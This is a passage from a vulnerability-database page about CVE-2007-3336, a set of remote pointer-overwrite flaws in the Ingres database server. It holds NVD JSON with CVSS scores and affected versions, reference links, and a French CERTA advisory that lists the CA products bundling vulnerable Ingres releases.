          {
            "name": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778",
            "refsource": "CONFIRM",
            "url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
          },
          {
            "name": "25756",
            "refsource": "SECUNIA",
            "url": "http://secunia.com/advisories/25756"
          },
          {
            "name": "25775",
            "refsource": "SECUNIA",
            "url": "http://secunia.com/advisories/25775"
          },
          {
            "name": "ADV-2007-2290",
            "refsource": "VUPEN",
            "url": "http://www.vupen.com/english/advisories/2007/2290"
          },
          {
            "name": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp",
            "refsource": "CONFIRM",
            "url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
          },
          {
            "name": "ingres-unspecified-code-execution(34993)",
            "refsource": "XF",
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
          },
          {
            "name": "ingres-pointer-code-execution(35000)",
            "refsource": "XF",
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
          },
          {
            "name": "24585",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/24585"
          },
          {
            "name": "37486",
            "refsource": "OSVDB",
            "url": "http://osvdb.org/37486"
          },
          {
            "name": "20070625 Ingres Unauthenticated Pointer Overwrite 1",
            "refsource": "BUGTRAQ",
            "url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
          },
          {
            "name": "20070625 Ingres Unauthenticated Pointer Overwrite 2",
            "refsource": "BUGTRAQ",
            "url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
          },
          {
            "name": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/",
            "refsource": "MISC",
            "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/"
          },
          {
            "name": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/",
            "refsource": "MISC",
            "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:ingres:database_server:9.0.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ingres:database_server:r3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ingres:database_server:2.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ingres:database_server:2.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-3336"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Multiple \"pointer overwrite\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "NVD-CWE-Other"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp",
              "refsource": "CONFIRM",
              "tags": [
                "Patch"
              ],
              "url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
            },
            {
              "name": "20070625 Ingres Unauthenticated Pointer Overwrite 1",
              "refsource": "BUGTRAQ",
              "tags": [],
              "url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
            },
            {
              "name": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/",
              "refsource": "MISC",
              "tags": [],
              "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/"
            },
            {
              "name": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/",
              "refsource": "MISC",
              "tags": [],
              "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
            },
            {
              "name": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778",
              "refsource": "CONFIRM",
              "tags": [],
              "url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
            },
            {
              "name": "24585",
              "refsource": "BID",
              "tags": [],
              "url": "http://www.securityfocus.com/bid/24585"
            },
            {
              "name": "25775",
              "refsource": "SECUNIA",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "http://secunia.com/advisories/25775"
            },
            {
              "name": "25756",
              "refsource": "SECUNIA",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "http://secunia.com/advisories/25756"
            },
            {
              "name": "ADV-2007-2288",
              "refsource": "VUPEN",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "http://www.vupen.com/english/advisories/2007/2288"
            },
            {
              "name": "ADV-2007-2290",
              "refsource": "VUPEN",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "http://www.vupen.com/english/advisories/2007/2290"
            },
            {
              "name": "37486",
              "refsource": "OSVDB",
              "tags": [],
              "url": "http://osvdb.org/37486"
            },
            {
              "name": "ingres-pointer-code-execution(35000)",
              "refsource": "XF",
              "tags": [],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
            },
            {
              "name": "ingres-unspecified-code-execution(34993)",
              "refsource": "XF",
              "tags": [],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
            },
            {
              "name": "20070625 Ingres Unauthenticated Pointer Overwrite 2",
              "refsource": "BUGTRAQ",
              "tags": [],
              "url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "COMPLETE",
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 10.0,
          "obtainAllPrivilege": true,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        }
      },
      "lastModifiedDate": "2018-10-16T16:48Z",
      "publishedDate": "2007-06-22T18:30Z"
    }
  }
}

FKIE_CVE-2007-3336

Vulnerability from fkie_nvd - Published: 2007-06-22 18:30 - Updated: 2025-04-09 00:30

Severity ?

Summary

References

URL	Tags
cve@mitre.org	http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html
cve@mitre.org	http://osvdb.org/37486
cve@mitre.org	http://secunia.com/advisories/25756	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/25775	Vendor Advisory
cve@mitre.org	http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp	Patch
cve@mitre.org	http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778
cve@mitre.org	http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/
cve@mitre.org	http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/
cve@mitre.org	http://www.securityfocus.com/archive/1/472193/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/bid/24585
cve@mitre.org	http://www.vupen.com/english/advisories/2007/2288	Vendor Advisory
cve@mitre.org	http://www.vupen.com/english/advisories/2007/2290	Vendor Advisory
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/34993
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/35000
af854a3a-2127-422b-91ae-364da2661108	http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html
af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/37486
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/25756	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/25775	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp	Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778
af854a3a-2127-422b-91ae-364da2661108	http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/
af854a3a-2127-422b-91ae-364da2661108	http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/472193/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/24585
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2007/2288	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2007/2290	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/34993
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/35000

Impacted products

Vendor	Product	Version
ingres	database_server	2.5
ingres	database_server	2.6
ingres	database_server	9.0.4
ingres	database_server	r3

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:ingres:database_server:2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D23E67C-E964-4571-B6FA-DCC910FD2A7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:ingres:database_server:2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "D0D77591-A8B7-4BAE-9761-CEB5A739A9E1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:ingres:database_server:9.0.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "DFE10403-BEB4-4A63-BC0D-CC5803584F5E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:ingres:database_server:r3:*:*:*:*:*:*:*",
              "matchCriteriaId": "01A77427-8C8D-4ABD-8502-F40D704B5F8A",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple \"pointer overwrite\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples vulnerabilidades \"pointer overwrite\" en  Ingres database server 2006 versiones 9.0.4, r3, 2.6 y 2.5, tal como se usa en varios productos de CA (anteriormente Computer Associates), permiten a los atacantes remotos ejecutar c\u00f3digo arbitrario mediante el env\u00edo de ciertos datos TCP en diferentes momentos hacia Ingres Communications Server Process (iigcc), que llama a las funciones (1) QUinsert o (2) QUremove con entrada controlada por el atacante."
    }
  ],
  "id": "CVE-2007-3336",
  "lastModified": "2025-04-09T00:30:58.490",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 10.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": true,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2007-06-22T18:30:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/37486"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/25756"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/25775"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/24585"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2007/2288"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2007/2290"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/37486"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/25756"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/25775"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/24585"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2007/2288"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2007/2290"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

CERTA-2007-AVI-275

Vulnerability from certfr_avis - Published: - Updated:

De multiples vulnérabilités affectant la base de données Ingres permettent l'exécution de code arbitraire à distance.

Description

Sept vulnérabilités affectant la base de données Ingres ont été rendues publiques. Plusieurs de ces vulnérabilités permettent l'exécution de code arbitraire à distance, sans authentification préalable. L'exploitation d'une de ces vulnérabilités se fait par l'intermédiaire de paquets malformés envoyés aux services iigcc (port 10916/tcp) et iigcd (port 10923/tcp).

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Ingres 2006 version 9.0.4 ;
Ingres r3 ;
Ingres 2.6 ;
Ingres 2.5.

Les versions vulnérables d'Ingres sont intégrées dans les produits suivants :

Advantage Data Transformer r2.2 ;
AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1 ;
AllFusion Harvest Change Manager r7, r7.1 ;
BrightStor ARCserve Backup v9 (Linux seulement), r11.1, r11.5 (Unix, Linux et Mainframe Linux) ;
BrightStor ARCserve Backup for Laptops and Desktops r11.5 ;
BrightStor Enterprise Backup (Unix seulement) t10.5 ;
BrightStor Storage Command Center r11.5 ;
BrightStor Storage Resource Manager r11.5 ;
CleverPath Aio Business Rules Expert r10.1 ;
CleverPath Predictive Analysis Server r3 ;
DocServer 1.1 ;
eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 ;
eTrust Audit r8 SP2 ;
eTrust Directory r8.1 ;
eTrust IAM Suite r8.0 ;
eTrust IAM Toolkit r8.0, r8.1 ;
eTrust Identity Manager r8.1 ;
eTrust Network Forensics r8.1 ;
eTrust Secure Content Manager r8 ;
eTrust Single Sign-On r7, r8, r8.1 ;
eTrust Web Access Control 1.0 ;
Unicenter Advanced Systems Management r11 ;
Unicenter Asset Intelligence r11 ;
Unicenter Asset Portfolio Management r11 r2.1, r11.3 ;
Unicenter CCS r11 ;
Unicenter Database Command Center r11.1 ;
Unicenter Desktop and Server Management r11 ;
Unicenter Desktop Management Suite r11 ;
Unicenter Enterprise Job Manager r1 SP3, r1 SP4 ;
Unicenter Job Management Option r11 ;
Unicenter Lightweight Portal 2 ;
Unicenter Management Portal r3.1.1 ;
Unicenter Network and Systems Management r3.0, r11 ;
Unicenter Network and Systems Management - Tiered - Multi Platform r3.0 0305, r3.1 0403, r11.0 ;
Unicenter Patch Management r11 ;
Unicenter Remote Control 6, r11 ;
Unicenter Service Accounting r11, r11.1 ;
Unicenter Service Assure r2.2, r11, r11.1 ;
Unicenter Service Catalog r11, r11.1 ;
Unicenter Service Delivery r11.0, r11.1 ;
Unicenter Service Intelligence r11 ;
Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1 ;
Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1, r11.2 ;
Unicenter Software Delivery r11 ;
Unicenter TNG 2.4, 2.4.2, 2.4.2J ;
Unicenter Workload Control Center r1 SP3, r1 SP4 ;
Unicenter Web Services Distributed Management 3.11, 3.50 ;
Wily SOA Manager 7.1.

Impacted products

	Vendor	Product	Description

References

Title

Publication Time

Tags

Bulletins de sécurité Computer Associates du 21 juin 2007

None

vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [],
  "affected_systems_content": "\u003cUL\u003e    \u003cLI\u003eIngres 2006 version 9.0.4 ;\u003c/LI\u003e    \u003cLI\u003eIngres r3 ;\u003c/LI\u003e    \u003cLI\u003eIngres 2.6 ;\u003c/LI\u003e    \u003cLI\u003eIngres 2.5.\u003c/LI\u003e  \u003c/UL\u003e  \u003cP\u003eLes versions vuln\u00e9rables d\u0027\u003cSPAN class=\"textit\"\u003eIngres\u003c/SPAN\u003e  sont int\u00e9gr\u00e9es dans les produits suivants :\u003c/P\u003e  \u003cUL\u003e    \u003cLI\u003eAdvantage Data Transformer r2.2 ;\u003c/LI\u003e    \u003cLI\u003eAllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1    ;\u003c/LI\u003e    \u003cLI\u003eAllFusion Harvest Change Manager r7, r7.1 ;\u003c/LI\u003e    \u003cLI\u003eBrightStor ARCserve Backup v9 (Linux seulement), r11.1,    r11.5 (Unix, Linux et Mainframe Linux) ;\u003c/LI\u003e    \u003cLI\u003eBrightStor ARCserve Backup for Laptops and Desktops r11.5    ;\u003c/LI\u003e    \u003cLI\u003eBrightStor Enterprise Backup (Unix seulement) t10.5 ;\u003c/LI\u003e    \u003cLI\u003eBrightStor Storage Command Center r11.5 ;\u003c/LI\u003e    \u003cLI\u003eBrightStor Storage Resource Manager r11.5 ;\u003c/LI\u003e    \u003cLI\u003eCleverPath Aio Business Rules Expert r10.1 ;\u003c/LI\u003e    \u003cLI\u003eCleverPath Predictive Analysis Server r3 ;\u003c/LI\u003e    \u003cLI\u003eDocServer 1.1 ;\u003c/LI\u003e    \u003cLI\u003eeTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 ;\u003c/LI\u003e    \u003cLI\u003eeTrust Audit r8 SP2 ;\u003c/LI\u003e    \u003cLI\u003eeTrust Directory r8.1 ;\u003c/LI\u003e    \u003cLI\u003eeTrust IAM Suite r8.0 ;\u003c/LI\u003e    \u003cLI\u003eeTrust IAM Toolkit r8.0, r8.1 ;\u003c/LI\u003e    \u003cLI\u003eeTrust Identity Manager r8.1 ;\u003c/LI\u003e    \u003cLI\u003eeTrust Network Forensics r8.1 ;\u003c/LI\u003e    \u003cLI\u003eeTrust Secure Content Manager r8 ;\u003c/LI\u003e    \u003cLI\u003eeTrust Single Sign-On r7, r8, r8.1 ;\u003c/LI\u003e    \u003cLI\u003eeTrust Web Access Control 1.0 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Advanced Systems Management r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Asset Intelligence r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Asset Portfolio Management r11 r2.1, r11.3 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter CCS r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Database Command Center r11.1 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Desktop and Server Management r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Desktop Management Suite r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Enterprise Job Manager r1 SP3, r1 SP4 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Job Management Option r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Lightweight Portal 2 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Management Portal r3.1.1 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Network and Systems Management r3.0, r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Network and Systems Management - Tiered - Multi    Platform r3.0 0305, r3.1 0403, r11.0 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Patch Management r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Remote Control 6, r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Service Accounting r11, r11.1 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Service Assure r2.2, r11, r11.1 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Service Catalog r11, r11.1 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Service Delivery r11.0, r11.1 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Service Intelligence r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1    ;\u003c/LI\u003e    \u003cLI\u003eUnicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1,    r11, r11.1, r11.2 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Software Delivery r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter TNG 2.4, 2.4.2, 2.4.2J ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Workload Control Center r1 SP3, r1 SP4 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Web Services Distributed Management 3.11, 3.50    ;\u003c/LI\u003e    \u003cLI\u003eWily SOA Manager 7.1.\u003c/LI\u003e  \u003c/UL\u003e",
  "content": "## Description\n\nSept vuln\u00e9rabilit\u00e9s affectant la base de donn\u00e9es Ingres ont \u00e9t\u00e9 rendues\npubliques. Plusieurs de ces vuln\u00e9rabilit\u00e9s permettent l\u0027ex\u00e9cution de\ncode arbitraire \u00e0 distance, sans authentification pr\u00e9alable.\nL\u0027exploitation d\u0027une de ces vuln\u00e9rabilit\u00e9s se fait par l\u0027interm\u00e9diaire\nde paquets malform\u00e9s envoy\u00e9s aux services iigcc (port 10916/tcp) et\niigcd (port 10923/tcp).\n\n## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2007-3338",
      "url": "https://www.cve.org/CVERecord?id=CVE-2007-3338"
    },
    {
      "name": "CVE-2007-3334",
      "url": "https://www.cve.org/CVERecord?id=CVE-2007-3334"
    },
    {
      "name": "CVE-2007-3337",
      "url": "https://www.cve.org/CVERecord?id=CVE-2007-3337"
    },
    {
      "name": "CVE-2007-3336",
      "url": "https://www.cve.org/CVERecord?id=CVE-2007-3336"
    }
  ],
  "links": [],
  "reference": "CERTA-2007-AVI-275",
  "revisions": [
    {
      "description": "version initiale.",
      "revision_date": "2007-06-22T00:00:00.000000"
    },
    {
      "description": "ajout des produits affect\u00e9s int\u00e9grant une version vuln\u00e9rable d\u0027Ingres, ajout des r\u00e9f\u00e9rences CVE et d\u0027un bulletin de s\u00e9curit\u00e9 Computer Associates.",
      "revision_date": "2007-06-25T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s affectant la base de donn\u00e9es \u003cspan\nclass=\"textit\"\u003eIngres\u003c/span\u003e permettent l\u0027ex\u00e9cution de code arbitraire \u00e0\ndistance.\n",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans Ingres",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletins de s\u00e9curit\u00e9 Computer Associates du 21 juin 2007",
      "url": "http://www.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=145778"
    }
  ]
}

CERTA-2007-AVI-275

Vulnerability from certfr_avis - Published: - Updated:

De multiples vulnérabilités affectant la base de données Ingres permettent l'exécution de code arbitraire à distance.

Description

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Ingres 2006 version 9.0.4 ;
Ingres r3 ;
Ingres 2.6 ;
Ingres 2.5.

Les versions vulnérables d'Ingres sont intégrées dans les produits suivants :

Advantage Data Transformer r2.2 ;
AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1 ;
AllFusion Harvest Change Manager r7, r7.1 ;
BrightStor ARCserve Backup v9 (Linux seulement), r11.1, r11.5 (Unix, Linux et Mainframe Linux) ;
BrightStor ARCserve Backup for Laptops and Desktops r11.5 ;
BrightStor Enterprise Backup (Unix seulement) t10.5 ;
BrightStor Storage Command Center r11.5 ;
BrightStor Storage Resource Manager r11.5 ;
CleverPath Aio Business Rules Expert r10.1 ;
CleverPath Predictive Analysis Server r3 ;
DocServer 1.1 ;
eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 ;
eTrust Audit r8 SP2 ;
eTrust Directory r8.1 ;
eTrust IAM Suite r8.0 ;
eTrust IAM Toolkit r8.0, r8.1 ;
eTrust Identity Manager r8.1 ;
eTrust Network Forensics r8.1 ;
eTrust Secure Content Manager r8 ;
eTrust Single Sign-On r7, r8, r8.1 ;
eTrust Web Access Control 1.0 ;
Unicenter Advanced Systems Management r11 ;
Unicenter Asset Intelligence r11 ;
Unicenter Asset Portfolio Management r11 r2.1, r11.3 ;
Unicenter CCS r11 ;
Unicenter Database Command Center r11.1 ;
Unicenter Desktop and Server Management r11 ;
Unicenter Desktop Management Suite r11 ;
Unicenter Enterprise Job Manager r1 SP3, r1 SP4 ;
Unicenter Job Management Option r11 ;
Unicenter Lightweight Portal 2 ;
Unicenter Management Portal r3.1.1 ;
Unicenter Network and Systems Management r3.0, r11 ;
Unicenter Network and Systems Management - Tiered - Multi Platform r3.0 0305, r3.1 0403, r11.0 ;
Unicenter Patch Management r11 ;
Unicenter Remote Control 6, r11 ;
Unicenter Service Accounting r11, r11.1 ;
Unicenter Service Assure r2.2, r11, r11.1 ;
Unicenter Service Catalog r11, r11.1 ;
Unicenter Service Delivery r11.0, r11.1 ;
Unicenter Service Intelligence r11 ;
Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1 ;
Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1, r11.2 ;
Unicenter Software Delivery r11 ;
Unicenter TNG 2.4, 2.4.2, 2.4.2J ;
Unicenter Workload Control Center r1 SP3, r1 SP4 ;
Unicenter Web Services Distributed Management 3.11, 3.50 ;
